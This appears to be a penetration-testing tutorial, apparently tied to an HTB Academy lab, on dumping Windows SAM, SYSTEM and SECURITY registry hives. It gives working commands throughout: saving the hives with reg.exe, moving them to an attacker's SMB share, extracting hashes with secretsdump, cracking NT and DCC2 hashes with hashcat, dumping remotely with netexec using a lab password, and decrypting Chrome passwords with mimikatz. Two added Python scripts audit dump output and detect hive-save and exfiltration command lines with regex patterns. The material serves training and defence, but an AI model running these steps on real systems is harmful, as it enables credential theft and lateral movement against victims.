# Attacking SAM, SYSTEM, and SECURITY

#### What this section is about

You have admin access to a Windows machine. You want to extract all local user password hashes so you can crack them offline. This section covers exactly how to do that — locally and remotely.

***

#### The 3 Registry Hives you need

Think of these as three files you need to steal:

| Hive            | What's inside                                | Why you need it                                  |
| --------------- | -------------------------------------------- | ------------------------------------------------ |
| `HKLM\SAM`      | Local user password hashes                   | The actual hashes you want to crack              |
| `HKLM\SYSTEM`   | The boot key                                 | Needed to decrypt the SAM — useless without this |
| `HKLM\SECURITY` | Cached domain creds, DPAPI keys, LSA secrets | Bonus — domain user hashes cached locally        |

You need both SAM and SYSTEM together — SAM alone is encrypted and useless without the boot key from SYSTEM.

***

#### Method 1 — Local dumping (you're on the machine)

**Step 1 — Save the registry hives**

```cmd
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
```

This writes copies of all three hives to disk. `reg.exe save` on these hives only works from an elevated (administrator) prompt.

**Step 2 — Transfer to your attack machine**

Set up an SMB share on your Kali:

```bash
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/user/Documents/
```

Then from the Windows target, move the files to your share:

```cmd
move C:\sam.save \\<your-IP>\CompData
move C:\security.save \\<your-IP>\CompData
move C:\system.save \\<your-IP>\CompData
```

`-smb2support` is important: modern Windows has SMBv1 disabled, so without this flag the transfer fails.

**Step 3 — Dump hashes with secretsdump**

```bash
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```

Output format:

```
username:RID:LMhash:NThash:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
```

* **RID** — user ID (500 = Administrator, 501 = Guest)
* **LM hash** — old, weak, mostly empty (`aad3b435...` = blank LM hash)
* **NT hash** — what you actually crack — the last part before `:::`

secretsdump first extracts the boot key from SYSTEM, uses it to decrypt SAM, then dumps the hashes.
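The `username:RID:LMhash:NThash:::` lines are easy to eyeball, but on a box with dozens of local accounts you want a script to pull out what matters. This is an added example (not part of the page, not Impacket code) that parses constructed secretsdump output and flags the things a reviewer checks first: the built-in Administrator (RID 500), accounts with an empty password (the NT hash of `""` is `31d6cfe0...`), accounts that still have a real LM hash stored, and accounts sharing one NT hash (same password reused). The sample output and hashes below are constructed; the only real values are the well-known blank LM/NT hashes and the LM/NT hashes of the string `password`.

```python
import re
from collections import defaultdict

# Constructed secretsdump-style output for this example (no real credentials).
SAMPLE_OUTPUT = """\
[*] Target system bootKey: 0x0123456789abcdef0123456789abcdef
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
svc_backup:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Cleaning up...
"""

BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# One SAM row: user:RID:LM:NT::: (hex digests are always 32 chars)
SAM_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.I,
)


def parse_sam_lines(text):
    """Return one dict per hash row; secretsdump status lines ([*] ...) are skipped."""
    rows = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            row = m.groupdict()
            row["rid"] = int(row["rid"])
            row["lm"] = row["lm"].lower()
            row["nt"] = row["nt"].lower()
            rows.append(row)
    return rows


def audit(rows):
    """Flag the weaknesses worth reporting from a SAM dump, as (account, finding) tuples."""
    findings = []
    by_nt = defaultdict(list)
    for r in rows:
        by_nt[r["nt"]].append(r["user"])
        if r["rid"] == 500:
            findings.append((r["user"], "built-in Administrator (RID 500)"))
        if r["nt"] == BLANK_NT:
            findings.append((r["user"], "empty password"))
        if r["lm"] != BLANK_LM:
            findings.append((r["user"], "LM hash stored (LM storage should be disabled)"))
    # Same NT hash on two accounts means the same password; no salt hides it.
    for nt, users in by_nt.items():
        if len(users) > 1 and nt != BLANK_NT:
            findings.append((",".join(users), "password reuse (identical NT hash)"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_sam_lines(SAMPLE_OUTPUT)):
        print(f"{account}: {finding}")
```

The reuse check is the one that usually pays off in a report: because NT hashes are unsalted, two accounts with the same hash have the same password, and you know that before cracking anything.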

**Step 4 — Crack NT hashes with hashcat**

```bash
# Put NT hashes in a file
vim hashestocrack.txt

# Crack — mode 1000 = NTLM/NT hashes
hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt
```
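Everything in Method 1 leaves a loud trail on the target: `reg.exe save` of the SAM/SYSTEM/SECURITY hives and a `move` of the resulting files to a UNC path. This added example (not from the page, and not a Sysmon or SIEM rule taken from any product) runs simple detection logic over constructed process-creation events shaped like Sysmon Event ID 1 fields (`Image`, `CommandLine`, `ParentImage`, `User`). It raises a `high` alert on any hive save, escalates to `critical` once the same user has saved both SAM and SYSTEM (the pair needed to recover hashes), and flags a `.save` file being moved to a share. Host names, paths and the `10.10.14.5` address are made up for the sample.

```python
import re

# Constructed events in the shape of Sysmon Event ID 1 (process creation) fields.
EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save hklm\sam C:\sam.save",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"WS01\bob"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save hklm\system C:\system.save",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"WS01\bob"},
    {"Image": r"C:\Windows\System32\reg.exe",   # benign registry query, must not alert
     "CommandLine": r'reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion"',
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"WS01\bob"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c move C:\sam.save \\10.10.14.5\CompData",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"WS01\bob"},
    {"Image": r"C:\Windows\System32\svchost.exe",  # unrelated noise
     "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe", "User": "NT AUTHORITY\\SYSTEM"},
]

# reg[.exe] save|export hklm\(sam|system|security) ...
HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+(?:save|export)\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b",
    re.I,
)
# move/copy of a saved hive file to a UNC path (\\host\share)
HIVE_TO_UNC = re.compile(
    r"\b(?:move|copy|xcopy|robocopy)\b.*\b(sam|system|security)\.save\b.*\\\\[^\s\\]+\\",
    re.I,
)


def classify(event):
    """Return (kind, HIVE) for a suspicious command line, or None for anything else."""
    cmd = event.get("CommandLine", "")
    m = HIVE_SAVE.search(cmd)
    if m:
        return ("hive_dump", m.group(1).upper())
    m = HIVE_TO_UNC.search(cmd)
    if m:
        return ("hive_exfil", m.group(1).upper())
    return None


def detect(events):
    """Run the rules over a list of events and return alerts in order of occurrence."""
    alerts = []
    saved_by_user = {}  # user -> set of hives that user has saved so far
    for index, ev in enumerate(events):
        hit = classify(ev)
        if hit is None:
            continue
        kind, hive = hit
        user = ev.get("User", "?")
        severity = "high"
        if kind == "hive_dump":
            saved_by_user.setdefault(user, set()).add(hive)
            # SAM alone is encrypted; SAM + SYSTEM together is the real loss.
            if {"SAM", "SYSTEM"} <= saved_by_user[user]:
                severity = "critical"
        alerts.append({"event": index, "user": user, "kind": kind,
                       "hive": hive, "severity": severity})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Real telemetry also gives you Object Access events on the SAM hive itself and the SMB connection to the share; the point here is that the command lines on this page are distinctive enough to match on by themselves.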

***

#### Method 2 — Remote dumping (from your attack machine)

If you already have valid admin credentials, you don't even need to be on the machine.

```bash
# Dump SAM remotely (password is single-quoted so the shell leaves the ! alone)
netexec smb 10.129.42.198 --local-auth -u bob -p 'HTB_@cademy_stdnt!' --sam

# Dump LSA secrets remotely
netexec smb 10.129.42.198 --local-auth -u bob -p 'HTB_@cademy_stdnt!' --lsa
```

`--local-auth` authenticates with a local account instead of a domain account, which matters on machines that are not domain-joined.

***

#### DCC2 hashes — the harder ones

When secretsdump dumps `HKLM\SECURITY` it also grabs cached domain credentials in DCC2 format:

```
inlanefreight.local/Administrator:$DCC2$10240#administrator#23d97555...
```

These are hashes of domain user passwords cached locally so you can still log in when the DC is unreachable.

Key differences from NT hashes:

|               | NT Hash           | DCC2 Hash                 |
| ------------- | ----------------- | ------------------------- |
| Speed         | ~4.6 million/sec  | ~5,500/sec — 800x slower  |
| Pass-the-Hash | Yes               | No                        |
| Hashcat mode  | `1000`            | `2100`                    |

```bash
hashcat -m 2100 '$DCC2$10240#administrator#23d97555...' /usr/share/wordlists/rockyou.txt
```

Because they're so slow to crack, strong DCC2 passwords are often uncrackable in a real engagement timeframe.

***

#### DPAPI — bonus credential goldmine

DPAPI keys are also dumped from `HKLM\SECURITY`. DPAPI is what Windows uses to encrypt saved passwords in:

* Chrome/Edge saved passwords
* Outlook email passwords
* Saved RDP credentials
* Credential Manager entries
* WiFi passwords

Once you have the DPAPI keys from secretsdump, you can decrypt all of these. To decrypt Chrome's saved passwords, at the mimikatz prompt:

```
mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
```

Output gives you plaintext URLs, usernames and passwords saved in the browser.

***

#### Full attack flow summary

```
Admin access on Windows machine
    ↓
reg.exe save → 3 hive files (SAM, SYSTEM, SECURITY)
    ↓
smbserver.py → create share on Kali
    ↓
move files to share
    ↓
secretsdump.py → extract NT hashes + DCC2 + DPAPI keys
    ↓
hashcat -m 1000 → crack NT hashes
hashcat -m 2100 → crack DCC2 (if needed)
mimikatz/dpapi → decrypt DPAPI blobs
    ↓
Cracked passwords → lateral movement, credential stuffing
```
